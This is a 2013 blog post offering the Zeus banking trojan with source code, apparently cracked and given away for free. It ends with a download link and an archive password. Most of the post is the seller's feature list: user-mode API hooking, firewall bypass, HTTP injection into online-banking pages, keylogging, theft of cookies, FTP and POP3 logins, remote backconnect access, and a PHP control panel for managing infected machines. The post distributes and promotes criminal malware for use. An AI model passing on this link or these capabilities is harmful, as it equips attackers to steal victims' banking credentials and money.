Zeus Bot w/ Source botnet | TipsS And TricksS

Zeus Bot w/ Source botnet

on Tuesday 19 February 2013
Zeus Bot
Price $ 1200 USA
and now it is broken at website: http://botnetvietnam.com = 0 USA

Description: Bot


Programming language and IDE:
- Visual C++ (current version 9.0). No additional libraries are used (crtl, MFC, etc.).
Supported operating systems:
- XP / Vista / Seven, as well as 2003/2003R2/2008/2008R2. This includes Windows x64, but only for 32-bit processes. The bot also keeps working in full under "Terminal Server".
Action principle:
- The bot is based on blocking the WinAPI by connecting in ring3 (user mode), running a copy of its code in each of the user's processes (without using a DLL).
The installation process:
At this point, the bot is designed mainly to work on Vista / Seven with UAC enabled, and without the use of local operators. The bot is therefore designed to work with minimal privileges (including the "Guest" user), so it always works within the session of a single user (the one under which the bot is installed). The bot can be installed for each user in the operating system, and the copies will not know about each other. When the bot is run as "LocalSystem", it will try to infect all users in the system.
On installation, the bot creates a copy of itself in the user's home directory. This copy is bound to the current user and operating system and cannot be run by another user, let alone on another system. The original copy of the bot (used for installation) is automatically deleted, regardless of whether installation succeeded.
Session with the server (control panel):
The session with the server runs through a series of processes from an internal "white list", which allows it to bypass most firewalls. During the session, the bot can be configured to send accumulated reports, report its status to the server, and receive commands to execute on the computer. The session takes place over HTTP; all data sent by the bot and received from the server is encrypted with a key unique to each botnet.
Protection:
- Unique names for all objects (files, mutexes, registry keys) are created by the bot for each user and botnet.
- An installed bot cannot be run on a different operating system or under a different user.
- The code used to install the bot is destroyed.
- At this point, bot files are not hidden via WinAPI, because anti-virus tools find such files very easily, which allows the location of the bot to be identified.
- Automatic update of the bot, without requiring a restart.
- Monitoring of the integrity of the bot's files.
Server-side function bot:
- Socks 4/4a/5 server with support for UDP and IPv6.
- Backconnect for any service (RDP, Socks, FTP, etc.) on the infected machine. That is, you can gain access to a computer that is behind a NAT or, for example, has connections blocked by a firewall. This feature requires an additional application running on any Windows server on the Internet that has a dedicated IP.
- Getting a screenshot of the desktop in real time.
- Block HTTP / HTTPS requests from the wininet.dll (Internet Explorer, Maxton, etc.) and nspr4.dll (Mozilla Firefox) libraries:
  - Modify the content of the loaded page (HTTP-injection).
  - Transparent page redirection (HTTP author).
  - Get the right pieces of data from the page content (e.g. bank account balance).
  - Temporary blocking of HTTP-injection and HTTP-fakes.
  - Temporary blocking of access to a certain URL.
  - Blocking the logging of requests for specific URLs.
  - Forcing the logging of all GET requests for specific URLs.
  - Create a snapshot of the screen around the mouse cursor on the click of a button.
  - Getting session cookies and blocking user access to specific URLs.
- Get important information from user programs:
  - Log from FTP clients: FlashFXP, CuteFTP, Total Commander, WsFTP, FileZilla, FAR Manager, WinSCP, FTP Commander, CoreFTP, SmartFTP.
  - "Cookies" of Adobe (Macromedia) Flash Player.
  - "Cookies" of wininet.dll, Mozilla Firefox.
- Import certificates from the Windows certificate store, and track those added afterwards.
- Track keyboard key presses.
- Traffic sniffer for TCP in Windows sockets.
- Intercept FTP logins on any port.
- Intercept POP3 logins on any port.
Miscellaneous:
- Execute scripts (commands) created in the control panel.
- Separate botnets into subbotnets (by name).

Description: Dashboard


Programming languages:
- PHP, using the mbstring and mysql extensions.
Show statistics:
- The number of infected computers.
- Current number of online programs.
- The number of new programs.
- Daily activity of programs.
- National statistics.
- Statistics of the operating system.
Working with a list of programs:
- Filter the list by country, botnet, IP address, NAT status, etc.
- Show desktop screenshots in real time (only for programs outside NAT).
- Mass status check of Socks servers.
- Display detailed information about programs. The most important are:
  - Windows version, user language and time zone.
  - Location and computer IP address (not local).
  - Internet connection speed (measured by calculating the load time of a predefined HTTP resource).
  - First and last communication with the server.
  - Online time.
- The ability to set a comment for each bot.
Script (command):
- You can control programs by creating scripts for them. Currently, the script syntax and capabilities are very primitive.
Working with reports (logs) and program files:
- Files (such as screenshots, Flash Player cookies) received from programs are always written to files on the server. You can search for files with a filter: program content, botnets and file name.
- Reports can be written to a file (% / reports.txt bot_id botnet% /%%) and to the database. In the first case, records are searched in exactly the same way as files. In the second case, you get more flexible filters, and reports from the control panel.
Receive notifications via IM (Jabber):
- You can receive messages from the control panel on a Jabber account.
- At this point it is possible to be notified about a user on an identified HTTP / HTTPS source. For example, it is used to capture user sessions in an online bank.
Miscellaneous:
- Create users with specific access control.
- Display information about the server software.
- Automatic recovery of damaged MyISAM tables.
linkdownloadhttp://botnetvietnam.googlecode.com/files/ZeuS% 202.0.8.9% 20% 28botnetvietnam.com% 29.rarpass: botnetvietnam.com
